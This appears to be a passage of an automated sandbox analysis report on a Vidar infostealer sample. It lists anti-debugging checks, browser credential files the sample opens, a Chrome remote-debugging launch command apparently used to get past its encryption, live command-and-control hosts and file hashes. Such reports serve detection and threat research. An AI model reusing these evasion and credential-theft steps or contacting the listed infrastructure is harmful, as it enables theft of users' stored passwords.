              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitions
              Source: chrome.exe, 0000000C.00000002.2540680415.00000249D29DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.sys
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000003.2433658544.00000249D9C10000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processormui
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor[|f.
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V Dynamic Memory Integration ServiceI
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V Hypervisor Root Virtual Processor?}
              Source: chrome.exe, 0000000C.00000002.2649650384.00000249D9B38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2431385780.00000249D9B4A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 2Hyper-V VM Vid Partition
              Source: C:\Users\user\Desktop\random(2).exe; System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\random(2).exe; Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\random(2).exe; Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\random(2).exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\random(2).exe; File opened: NTICE
              Source: C:\Users\user\Desktop\random(2).exe; File opened: SICE
              Source: C:\Users\user\Desktop\random(2).exe; File opened: SIWVID
              Source: C:\Users\user\Desktop\random(2).exe; Process queried: DebugPort
              Source: C:\Users\user\Desktop\random(2).exe; Process queried: DebugPort
              Source: C:\Users\user\Desktop\random(2).exe; Process queried: DebugPort
              Source: C:\Users\user\Desktop\random(2).exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\random(2).exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\random(2).exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\random(2).exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\random(2).exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              Source: Yara match; File source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR
              Source: C:\Users\user\Desktop\random(2).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\random(2).exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
              Source: C:\Users\user\Desktop\random(2).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\random(2).exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: Yara match; File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Users\user\Desktop\random(2).exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              Source: Yara match; File source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 631 Security Software Discovery | Remote Services | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 24 Virtualization/Sandbox Evasion | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 1 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              [Behavior graph, ID 1643067. Sample: random(2).exe; Startdate: 19/03/2025; Architecture: WINDOWS; Score: 100. Top-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures. random(2).exe contacts y.p.formaxprime.co.uk (78.47.63.132; 443, 49682, 49683; HETZNER-AS DE, Germany), t.me (149.154.167.99; 443, 49681; TELEGRAM RU, United Kingdom) and 127.0.0.1, with signatures: Attempt to bypass Chrome Application-Bound Encryption; Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to harvest and steal browser information (history, passwords, etc); 5 other signatures. random(2).exe starts three chrome.exe processes and 4 other processes; one chrome.exe starts a child chrome.exe that contacts www.google.com (142.250.186.164; 443, 49710, 49711; GOOGLE US, United States).]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| random(2).exe | 50% | Virustotal | | Browse |
| random(2).exe | 59% | ReversingLabs | Win32.Trojan.Vidar | |
| random(2).exe | 100% | Avira | TR/Crypt.TPM.Gen | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://ssl.google.cmanager.com | 0% | Avira URL Cloud | safe | |
| https://www.google.comAccess-Control-Allow-Credentials: | 0% | Avira URL Cloud | safe | |


| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| y.p.formaxprime.co.uk | 78.47.63.132 | true | true | | unknown |
| t.me | 149.154.167.99 | true | false | | high |
| www.google.com | 142.250.186.164 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://t.me/g_etcontent | false | | high |
| https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high |
| https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | false | | high |
| https://www.google.com/async/newtab_promos | false | | high |
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
78.47.63.132 | y.p.formaxprime.co.uk | Germany | 24940 | HETZNER-ASDE | true
                                                                                                                      IP
                                                                                                                      127.0.0.1
                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                      Analysis ID:1643067
                                                                                                                      Start date and time:2025-03-19 13:59:12 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 12m 53s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:21
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Sample name:random(2).exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@34/1@4/4
                                                                                                                      EGA Information:Failed
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.184.206, 142.250.186.99, 142.250.186.110, 173.194.76.84, 216.58.212.142, 142.250.185.238, 142.250.186.142, 20.12.23.50, 23.60.203.209, 20.189.173.26
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target random(2).exe, PID 6980 because there are no executed function
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:00:38 | API Interceptor | 31464405x Sleep call for process: random(2).exe modified
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/img/emoji/40/F09F9889.png
                                                                                                                      http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/?setln=pl
                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                      • telegram.org/
                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                      • telegram.dog/
                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                      • t.me/cinoshibot
                                                                                                                      78.47.63.132NWpNjnx.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                        random.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                          6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                                                                                            qdS0ohqZBN.exeGet hashmaliciousVidarBrowse
                                                                                                                              FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                  work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                    v7942.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                        TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          t.meSpacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          https://inkton.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.2.38
                                                                                                                                          DEVM28.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          CompiledProject.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          NWpNjnx.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          random.exe1.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          qdS0ohqZBN.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          9uB9RDznXl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          TELEGRAMRUimv-corp(ref0467) #U3010#U6ce8#U6587#U66f8#U3011sales Agreement WP2501001152 WP2501001159.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          https://inkton.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16427.1083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          rPedidoCota____oPC250009846.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          MM-7925-0224_110_AD.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.10462.29769.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          1.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          DEVM28.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          rInstrument_bms_docx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 94.130.189.58
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          https://teal-tamqrah-17.tiiny.io/1742248641265Get hashmaliciousUnknownBrowse
                                                                                                                                          • 144.76.124.123
                                                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                          • 88.198.246.242
                                                                                                                                          https://learn.empowerskill.org/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 78.46.12.250
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Spacey Sun 11.12.411 (1).exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
                                                                                                                                          a.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          • 78.47.63.132
01903025ZW-BP001.vbs | malicious | Remcos, GuLoader
• 149.154.167.99
• 78.47.63.132
Invio Ordine accompagnatorio n. 20250319-70611 del 03192025 - C.E.F. Srl.js | malicious | AgentTesla
• 149.154.167.99
• 78.47.63.132
BSKDh.98374.10.exe | malicious | Unknown
• 149.154.167.99
• 78.47.63.132
BSKDh.98374.10.exe | malicious | Unknown
• 149.154.167.99
• 78.47.63.132
Objedn#U00e1vka (PO).exe | malicious | FormBook, GuLoader
• 149.154.167.99
• 78.47.63.132
New Purchase Order.exe | malicious | MSIL Logger, MassLogger RAT, XRed
• 149.154.167.99
• 78.47.63.132
aJODAZPOfw.dll | malicious | Latrodectus
• 149.154.167.99
• 78.47.63.132
HSUa315AJm.dll | malicious | Latrodectus
• 149.154.167.99
• 78.47.63.132
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\random(2).exe
                                                                                                                                          File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10489
                                                                                                                                          Entropy (8bit):5.49400008804932
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:HnBRNC3YbBp6lR1+PaX56/x8lSz9/3/OHNBw8DXSl:Oee1M/xbUPwO0
                                                                                                                                          MD5:C285AF56A69C639A033B77359FEDE8A7
                                                                                                                                          SHA1:676A4F90E2ED82CB9ABEE7DAFC3A25D984B380EE
                                                                                                                                          SHA-256:ECF63A7733385EB825D49B5B351C0687E383F309D6849BE1C7AC06A1CD4E94B2
                                                                                                                                          SHA-512:53ABAF224CE47D77A6883AFCE25089C12D8362B4BCC01D94F94DF846C9F24AAFB2004502B7E3D5DC512E764B1EFB0B0E1FFC39FA5A423F82EA4E61B83E4E292E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.9442402156294
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:random(2).exe
                                                                                                                                          File size:1'822'720 bytes
                                                                                                                                          MD5:5e941e7c271e85093cb8344fb7cab50b
                                                                                                                                          SHA1:7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
                                                                                                                                          SHA256:51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
                                                                                                                                          SHA512:cdb456a668820c3437261c8353945420bb66c99f982909152f7fe1c0e87d8b563353a7d50131c66ec870fe7523e02861f6885a60b0a25fb23c43aaa296c9fd5f
                                                                                                                                          SSDEEP:49152:nJ8+d3JCptdgyTPoluHZe7+MCpOPiDzzC8KG3HG:Jld3Ep7FTAA5e7+vpaZlG
                                                                                                                                          TLSH:2D8533032913A596E1640FFB33A36B177762564BA115382FDE2E5C2A9E2FF1D7C014CA
                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.....................d....... H...........@..........................PH.....C.......................................U...i..
                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                          Entrypoint:0x882000
                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x67BBFA01 [Mon Feb 24 04:48:01 2025 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x28055 | 0x69 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x27000 | 0x40c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x281f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
